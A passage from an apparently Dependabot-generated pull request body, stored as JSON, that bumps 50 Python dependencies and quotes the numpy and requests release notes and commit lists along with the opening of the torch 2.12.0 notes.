io-libs/propcache"},{"name":"discord-py","old_version":"2.5.2","new_version":"2.7.1","repository_url":"https://github.com/Rapptz/discord.py"}],"path":null,"ecosystem":"pip"},"body":"[//]: # (dependabot-start)\n⚠️  **Dependabot is rebasing this PR** ⚠️ \n\nRebasing might not happen immediately, so don't worry if this takes some time.\n\nNote: if you make any changes to this PR yourself, they will take precedence over the rebase.\n\n---\n\n[//]: # (dependabot-end)\n\nBumps the python-minor-patch group with 50 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [numpy](https://github.com/numpy/numpy) | `2.4.4` | `2.4.6` |\n| [requests](https://github.com/psf/requests) | `2.33.1` | `2.34.2` |\n| [torch](https://github.com/pytorch/pytorch) | `2.11.0` | `2.12.0` |\n| [transformers](https://github.com/huggingface/transformers) | `5.7.0` | `5.10.2` |\n| [sentence-transformers](https://github.com/huggingface/sentence-transformers) | `5.4.1` | `5.5.1` |\n| [openai](https://github.com/openai/openai-python) | `2.32.0` | `2.41.0` |\n| [anthropic](https://github.com/anthropics/anthropic-sdk-python) | `0.96.0` | `0.107.1` |\n| [langchain-core](https://github.com/langchain-ai/langchain) | `1.4.0` | `1.4.1` |\n| [langsmith](https://github.com/langchain-ai/langsmith-sdk) | `0.8.4` | `0.8.9` |\n| [llama-index-core](https://github.com/run-llama/llama_index) | `0.14.20` | `0.14.22` |\n| [fastapi](https://github.com/fastapi/fastapi) | `0.136.0` | `0.136.3` |\n| [uvicorn](https://github.com/Kludex/uvicorn) | `0.44.0` | `0.49.0` |\n| [pydantic](https://github.com/pydantic/pydantic) | `2.13.1` | `2.13.4` |\n| [python-multipart](https://github.com/Kludex/python-multipart) | `0.0.28` | `0.0.32` |\n| [elevenlabs](https://github.com/elevenlabs/elevenlabs-python) | `2.43.0` | `2.51.0` |\n| [onnxruntime](https://github.com/microsoft/onnxruntime) | `1.22.0` | `1.26.0` |\n| [onnxruntime-gpu](https://github.com/microsoft/onnxruntime) | `1.24.4` | `1.26.0` |\n| [grpcio](https://github.com/grpc/grpc) | `1.78.0` | `1.81.0` |\n| [grpcio-tools](https://github.com/grpc/grpc) | `1.78.0` | `1.81.0` |\n| [mujoco](https://github.com/google-deepmind/mujoco) | `3.8.0` | `3.9.0` |\n| [scikit-learn](https://github.com/scikit-learn/scikit-learn) | `1.6.1` | `1.9.0` |\n| [qdrant-client](https://github.com/qdrant/qdrant-client) | `1.17.1` | `1.18.0` |\n| [faiss-cpu](https://github.com/facebookresearch/faiss) | `1.13.2` | `1.14.2` |\n| [polar-sdk](https://github.com/polarsource/polar-python) | `0.31.3` | `0.31.5` |\n| [langgraph](https://github.com/langchain-ai/langgraph) | `1.1.6` | `1.2.4` |\n| [haystack-ai](https://github.com/deepset-ai/haystack) | `2.27.0` | `2.30.0` |\n| [litellm](https://github.com/BerriAI/litellm) | `1.86.2` | `1.88.0` |\n| [mkdocs-jupyter](https://github.com/danielfrg/mkdocs-jupyter) | `0.26.2` | `0.26.3` |\n| [opentelemetry-api](https://github.com/open-telemetry/opentelemetry-python) | `1.41.0` | `1.42.1` |\n| [langfuse](https://github.com/langfuse/langfuse) | `4.3.1` | `4.7.1` |\n| [gradio](https://github.com/gradio-app/gradio) | `6.13.0` | `6.16.0` |\n| [pypdf](https://github.com/py-pdf/pypdf) | `6.10.2` | `6.13.0` |\n| [beautifulsoup4](https://www.crummy.com/software/BeautifulSoup/bs4/) | `4.14.3` | `4.15.0` |\n| [boto3](https://github.com/boto/boto3) | `1.42.90` | `1.43.24` |\n| [notion-client](https://github.com/ramnes/notion-sdk-py) | `3.0.0` | `3.1.0` |\n| [google-api-python-client](https://github.com/googleapis/google-api-python-client) | `2.194.0` | `2.197.0` |\n| [pyjwt](https://github.com/jpadilla/pyjwt) | `2.12.1` | `2.13.0` |\n| [psycopg2-binary](https://github.com/psycopg/psycopg2) | `2.9.11` | `2.9.12` |\n| [google-cloud-aiplatform](https://github.com/googleapis/python-aiplatform) | `1.149.0` | `1.156.0` |\n| [hypothesis](https://github.com/HypothesisWorks/hypothesis) | `6.151.10` | `6.155.2` |\n| [pytest-asyncio](https://github.com/pytest-dev/pytest-asyncio) | `1.3.0` | `1.4.0` |\n| [ruff](https://github.com/astral-sh/ruff) | `0.15.11` | `0.15.16` |\n| [build](https://github.com/pypa/build) | `1.4.3` | `1.5.0` |\n| [aiohappyeyeballs](https://github.com/aio-libs/aiohappyeyeballs) | `2.6.1` | `2.6.2` |\n| [anyio](https://github.com/agronholm/anyio) | `4.12.1` | `4.13.0` |\n| [certifi](https://github.com/certifi/python-certifi) | `2026.2.25` | `2026.5.20` |\n| [huggingface-hub](https://github.com/huggingface/huggingface_hub) | `1.12.0` | `1.18.0` |\n| [idna](https://github.com/kjd/idna) | `3.15` | `3.18` |\n| [propcache](https://github.com/aio-libs/propcache) | `0.4.1` | `0.5.2` |\n| [discord-py](https://github.com/Rapptz/discord.py) | `2.5.2` | `2.7.1` |\n\n\nUpdates `numpy` from 2.4.4 to 2.4.6\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/numpy/numpy/releases\"\u003enumpy's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev2.4.6 (May 18, 2026)\u003c/h2\u003e\n\u003ch1\u003eNumPy 2.4.6 Release Notes\u003c/h1\u003e\n\u003cp\u003eNumPy 2.4.6 is a quick release that fixes a regression discovered in the 2.4.5\nrelease.\u003c/p\u003e\n\u003cp\u003eThis release supports Python versions 3.11-3.14\u003c/p\u003e\n\u003ch2\u003eContributors\u003c/h2\u003e\n\u003cp\u003eA total of 4 people contributed to this release. People with a \u0026quot;+\u0026quot; by their\nnames contributed a patch for the first time.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e!EarlMilktea\u003c/li\u003e\n\u003cli\u003eCharles Harris\u003c/li\u003e\n\u003cli\u003eSebastian Berg\u003c/li\u003e\n\u003cli\u003eWarren Weckesser\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ePull requests merged\u003c/h2\u003e\n\u003cp\u003eA total of 4 pull requests were merged for this release.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/numpy/numpy/pull/31444\"\u003e#31444\u003c/a\u003e: MAINT: Prepare 2.4.x for further development\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/numpy/numpy/pull/31453\"\u003e#31453\u003c/a\u003e: BUG: Fix regression in \u003ccode\u003earr.conj()\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/numpy/numpy/pull/31459\"\u003e#31459\u003c/a\u003e: BUG: \u003ccode\u003enp.linalg.svd(..., hermitian=True)\u003c/code\u003e returns non-unitary...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/numpy/numpy/pull/31460\"\u003e#31460\u003c/a\u003e: BUG: Don't call INCREF/DECREF on descr in NpyStringAcquireAllocator...\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.4.5 (May 15, 2026)\u003c/h2\u003e\n\u003ch1\u003eNumPy 2.4.5 Release Notes\u003c/h1\u003e\n\u003cp\u003eNumPy 2.4.5 is a patch release that fixes bugs discovered after the 2.4.4\nrelease, has some typing improvements, and maintains infrastructure.\u003c/p\u003e\n\u003cp\u003eThis release supports Python versions 3.11-3.14\u003c/p\u003e\n\u003ch2\u003eContributors\u003c/h2\u003e\n\u003cp\u003eA total of 17 people contributed to this release. People with a \u0026quot;+\u0026quot; by their\nnames contributed a patch for the first time.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAleksei Nikiforov\u003c/li\u003e\n\u003cli\u003eAnarion Zuo +\u003c/li\u003e\n\u003cli\u003eAnkit Ahlawat\u003c/li\u003e\n\u003cli\u003eBreno Favaretto +\u003c/li\u003e\n\u003cli\u003eCharles Harris\u003c/li\u003e\n\u003cli\u003eIgor Krivenko +\u003c/li\u003e\n\u003cli\u003eIjtihed Kilani +\u003c/li\u003e\n\u003cli\u003eJoren Hammudoglu\u003c/li\u003e\n\u003cli\u003eMaarten Baert +\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/numpy/numpy/commit/b832a09cf2a169c833dd2371e7c07aa00b293242\"\u003e\u003ccode\u003eb832a09\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/numpy/numpy/issues/31462\"\u003e#31462\u003c/a\u003e from charris/prepare-2.4.6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/numpy/numpy/commit/57cc147d2ceacffc6534642bfbdebb3a80428e1e\"\u003e\u003ccode\u003e57cc147\u003c/code\u003e\u003c/a\u003e REL: Prepare for the NumPy 2.4.6 release\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/numpy/numpy/commit/0c72b0b53b6b83c004e434b2c7855e73c000d21e\"\u003e\u003ccode\u003e0c72b0b\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/numpy/numpy/issues/31459\"\u003e#31459\u003c/a\u003e from charris/backport-31347\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/numpy/numpy/commit/9778d26e0475d381ccb7817c3b4dd8cacef2b9eb\"\u003e\u003ccode\u003e9778d26\u003c/code\u003e\u003c/a\u003e BUG: core: Don't call INCREF/DECREF on descr in NpyStringAcquireAllocator. (#...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/numpy/numpy/commit/e0e38767d5d0f848ab44befeedcad71e8ef589c7\"\u003e\u003ccode\u003ee0e3876\u003c/code\u003e\u003c/a\u003e BUG: core: Don't call INCREF/DECREF on descr in NpyStringAcquireAllocator. (#...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/numpy/numpy/commit/d1bffeb9ec4ec0bf029c94ea35abffa92d5c30f2\"\u003e\u003ccode\u003ed1bffeb\u003c/code\u003e\u003c/a\u003e BUG: \u003ccode\u003enp.linalg.svd(..., hermitian=True)\u003c/code\u003e returns non-unitary \u003ccode\u003evh\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/numpy/numpy/issues/31347\"\u003e#31347\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/numpy/numpy/commit/8d8d7e5a14a1da0bfb0faf609a7a7610c431e6e9\"\u003e\u003ccode\u003e8d8d7e5\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/numpy/numpy/issues/31453\"\u003e#31453\u003c/a\u003e from seberg/issue-31452\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/numpy/numpy/commit/bddaab7ace45f90148d8f2bb6e67daab2d45ec76\"\u003e\u003ccode\u003ebddaab7\u003c/code\u003e\u003c/a\u003e BUG: Fix regression in \u003ccode\u003earr.conj()\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/numpy/numpy/commit/37a1ecca8dff09b2c579a991194ac55b9971f3a7\"\u003e\u003ccode\u003e37a1ecc\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/numpy/numpy/issues/31444\"\u003e#31444\u003c/a\u003e from charris/begin-2.4.6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/numpy/numpy/commit/3c0e043217a759a8a948ade158fec14348c3b459\"\u003e\u003ccode\u003e3c0e043\u003c/code\u003e\u003c/a\u003e MAINT: Prepare 2.4.x for further development\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/numpy/numpy/compare/v2.4.4...v2.4.6\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `requests` from 2.33.1 to 2.34.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/psf/requests/releases\"\u003erequests's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev2.34.2\u003c/h2\u003e\n\u003ch2\u003e2.34.2 (2026-05-14)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMoved \u003ccode\u003eheaders\u003c/code\u003e input type back to \u003ccode\u003eMapping\u003c/code\u003e to avoid invariance issues with \u003ccode\u003eMutableMapping\u003c/code\u003e and inferred dict types. Users calling \u003ccode\u003eRequest.headers.update()\u003c/code\u003e may need to narrow typing in their code. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7441\"\u003e#7441\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/psf/requests/blob/main/HISTORY.md#2342-2026-05-14\"\u003ehttps://github.com/psf/requests/blob/main/HISTORY.md#2342-2026-05-14\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev2.34.1\u003c/h2\u003e\n\u003ch2\u003e2.34.1 (2026-05-13)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eWidened \u003ccode\u003ejson\u003c/code\u003e input type from \u003ccode\u003edict\u003c/code\u003e and \u003ccode\u003elist\u003c/code\u003e to \u003ccode\u003eMapping\u003c/code\u003e\nand \u003ccode\u003eSequence\u003c/code\u003e. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7436\"\u003e#7436\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eChanged \u003ccode\u003eheaders\u003c/code\u003e input type to MutableMapping and removed \u003ccode\u003eNone\u003c/code\u003e from\n\u003ccode\u003eRequest.headers\u003c/code\u003e typing to improve handling for users. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7431\"\u003e#7431\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eResponse.reason\u003c/code\u003e moved from \u003ccode\u003estr | None\u003c/code\u003e to \u003ccode\u003estr\u003c/code\u003e to improve handling\nfor users. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7437\"\u003e#7437\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixed a bug where some bodies with custom \u003ccode\u003e__getattr__\u003c/code\u003e implementations\nweren't being properly detected as Iterables. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7433\"\u003e#7433\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/k223kim\"\u003e\u003ccode\u003e@​k223kim\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/psf/requests/pull/7433\"\u003epsf/requests#7433\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/psf/requests/blob/main/HISTORY.md#2341-2026-05-13\"\u003ehttps://github.com/psf/requests/blob/main/HISTORY.md#2341-2026-05-13\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev2.34.0\u003c/h2\u003e\n\u003ch2\u003e2.34.0 (2026-05-11)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eAnnouncements\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eRequests 2.34.0 introduces inline types, replacing those provided by\ntypeshed. Public API types should be fully compatible with mypy, pyright,\nand ty. \u003cstrong\u003eWe believe types are comprehensive but if you find issues, please\nreport them to the \u003ca href=\"https://redirect.github.com/psf/requests/issues/7271\"\u003epinned tracking issue\u003c/a\u003e.\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003eSpecial thanks to \u003ca href=\"https://github.com/bastimeyer\"\u003e\u003ccode\u003e@​bastimeyer\u003c/code\u003e\u003c/a\u003e, \u003ca href=\"https://github.com/cthoyt\"\u003e\u003ccode\u003e@​cthoyt\u003c/code\u003e\u003c/a\u003e, \u003ca href=\"https://github.com/edgarrmondragon\"\u003e\u003ccode\u003e@​edgarrmondragon\u003c/code\u003e\u003c/a\u003e, and \u003ca href=\"https://github.com/srittau\"\u003e\u003ccode\u003e@​srittau\u003c/code\u003e\u003c/a\u003e for\nhelping review and test the types ahead of the release. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7272\"\u003e#7272\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eImprovements\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eDigest Auth hashing algorithms have added \u003ccode\u003eusedforsecurity=False\u003c/code\u003e to clarify\nsecurity considerations. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7310\"\u003e#7310\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRequests added support for Python 3.15 based on beta1. Downstream projects\nshould be able to start testing prior to its release in October. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7422\"\u003e#7422\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRequests added support for Python 3.14t. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7419\"\u003e#7419\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eResponse.history\u003c/code\u003e no longer contains a reference to itself, preventing\naccidental looping when traversing the history list. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7328\"\u003e#7328\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRequests no longer performs greedy matching on no_proxy domains. The\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/psf/requests/blob/main/HISTORY.md\"\u003erequests's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.34.2 (2026-05-14)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMoved \u003ccode\u003eheaders\u003c/code\u003e input type back to \u003ccode\u003eMapping\u003c/code\u003e to avoid invariance issues\nwith \u003ccode\u003eMutableMapping\u003c/code\u003e and inferred dict types. Users calling\n\u003ccode\u003eRequest.headers.update()\u003c/code\u003e may need to narrow typing in their code. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7441\"\u003e#7441\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.34.1 (2026-05-13)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eWidened \u003ccode\u003ejson\u003c/code\u003e input type from \u003ccode\u003edict\u003c/code\u003e and \u003ccode\u003elist\u003c/code\u003e to \u003ccode\u003eMapping\u003c/code\u003e\nand \u003ccode\u003eSequence\u003c/code\u003e. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7436\"\u003e#7436\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eChanged \u003ccode\u003eheaders\u003c/code\u003e input type to MutableMapping and removed \u003ccode\u003eNone\u003c/code\u003e from\n\u003ccode\u003eRequest.headers\u003c/code\u003e typing to improve handling for users. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7431\"\u003e#7431\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eResponse.reason\u003c/code\u003e moved from \u003ccode\u003estr | None\u003c/code\u003e to \u003ccode\u003estr\u003c/code\u003e to improve handling\nfor users. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7437\"\u003e#7437\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixed a bug where some bodies with custom \u003ccode\u003e__getattr__\u003c/code\u003e implementations\nweren't being properly detected as Iterables. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7433\"\u003e#7433\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.34.0 (2026-05-11)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eAnnouncements\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eRequests 2.34.0 introduces inline types, replacing those provided by\ntypeshed. Public API types should be fully compatible with mypy, pyright,\nand ty. We believe types are comprehensive but if you find issues, please\nreport them to the pinned tracking issue.\u003c/p\u003e\n\u003cp\u003eSpecial thanks to \u003ca href=\"https://github.com/bastimeyer\"\u003e\u003ccode\u003e@​bastimeyer\u003c/code\u003e\u003c/a\u003e, \u003ca href=\"https://github.com/cthoyt\"\u003e\u003ccode\u003e@​cthoyt\u003c/code\u003e\u003c/a\u003e, \u003ca href=\"https://github.com/edgarrmondragon\"\u003e\u003ccode\u003e@​edgarrmondragon\u003c/code\u003e\u003c/a\u003e, and \u003ca href=\"https://github.com/srittau\"\u003e\u003ccode\u003e@​srittau\u003c/code\u003e\u003c/a\u003e for\nhelping review and test the types ahead of the release. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7272\"\u003e#7272\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eImprovements\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eDigest Auth hashing algorithms have added \u003ccode\u003eusedforsecurity=False\u003c/code\u003e to clarify\nsecurity considerations. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7310\"\u003e#7310\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRequests added support for Python 3.15 based on beta1. Downstream projects\nshould be able to start testing prior to its release in October. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7422\"\u003e#7422\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRequests added support for Python 3.14t. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7419\"\u003e#7419\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eResponse.history\u003c/code\u003e no longer contains a reference to itself, preventing\naccidental looping when traversing the history list. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7328\"\u003e#7328\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRequests no longer performs greedy matching on no_proxy domains. The\nproxy_bypass implementation has been updated with CPython's fix from\nbpo-39057. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7427\"\u003e#7427\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRequests no longer incorrectly strips duplicate leading slashes in\nURI paths. This should address user issues with specific presigned\nURLs. Note the full fix requires urllib3 2.7.0+. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7315\"\u003e#7315\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/6e83187b8feb273ed4c6cdab5efd8d54901dfab3\"\u003e\u003ccode\u003e6e83187\u003c/code\u003e\u003c/a\u003e v2.34.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/84d10f0be83e8f6aeca8a05230c52216431c4d0b\"\u003e\u003ccode\u003e84d10f0\u003c/code\u003e\u003c/a\u003e Move Request.headers back to Mapping (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7441\"\u003e#7441\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/b7b549b54571d03950b16afd2d01bc6ff0348224\"\u003e\u003ccode\u003eb7b549b\u003c/code\u003e\u003c/a\u003e v2.34.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/e511bc72777a94c45d004e010c597925092e1efe\"\u003e\u003ccode\u003ee511bc7\u003c/code\u003e\u003c/a\u003e Fix mutability issues with headers input types (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7431\"\u003e#7431\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/5691f596134c2feb121e595c77a0178921fcce61\"\u003e\u003ccode\u003e5691f59\u003c/code\u003e\u003c/a\u003e Update JsonType containers to read-based collections (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7436\"\u003e#7436\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/2144213c307691710c9d665700860fc4993c3035\"\u003e\u003ccode\u003e2144213\u003c/code\u003e\u003c/a\u003e Constrain Response.reason to str (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7437\"\u003e#7437\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/6404f345e562d962abe6700a1c357ec1e7e18232\"\u003e\u003ccode\u003e6404f34\u003c/code\u003e\u003c/a\u003e Fix \u003ccode\u003eprepare_body\u003c/code\u003e stream detection for \u003ccode\u003e__getattr__\u003c/code\u003e-based file wrappers (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7\"\u003e#7\u003c/a\u003e...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/0b401c76b6e80a4eecf3c690085b2553f6e261ca\"\u003e\u003ccode\u003e0b401c7\u003c/code\u003e\u003c/a\u003e v2.34.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/86b378d3f60f828daa13ca50aa82e287ff7b66b4\"\u003e\u003ccode\u003e86b378d\u003c/code\u003e\u003c/a\u003e Align Session.get parameters with requests.get (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7429\"\u003e#7429\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/a4f9a5999bdb9bf2d6e7c8aa973b28cacb17134f\"\u003e\u003ccode\u003ea4f9a59\u003c/code\u003e\u003c/a\u003e Port bpo-39057 to Requests (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7427\"\u003e#7427\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/psf/requests/compare/v2.33.1...v2.34.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `torch` from 2.11.0 to 2.12.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pytorch/pytorch/releases\"\u003etorch's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003ePyTorch 2.12.0 Release Notes\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytorch/pytorch/blob/HEAD/#highlights\"\u003eHighlights\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytorch/pytorch/blob/HEAD/#backwards-incompatible-changes\"\u003eBackwards Incompatible Changes\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytorch/pytorch/blob/HEAD/#deprecations\"\u003eDeprecations\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytorch/pytorch/blob/HEAD/#new-features\"\u003eNew Features\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytorch/pytorch/blob/HEAD/#improvements\"\u003eImprovements\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytorch/pytorch/blob/HEAD/#bug-fixes\"\u003eBug fixes\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytorch/pytorch/blob/HEAD/#performance\"\u003ePerformance\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytorch/pytorch/blob/HEAD/#documentation\"\u003eDocumentation\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytorch/pytorch/blob/HEAD/#developers\"\u003eDevelopers\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytorch/pytorch/blob/HEAD/#security\"\u003eSecurity\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eHighlights\u003c/h1\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003cp\u003eFor more details about these highlighted features, you can look at the release blogpost. Below are the full release notes for this release.\u003c/p\u003e\n\u003ch1\u003eBackwards Incompatible 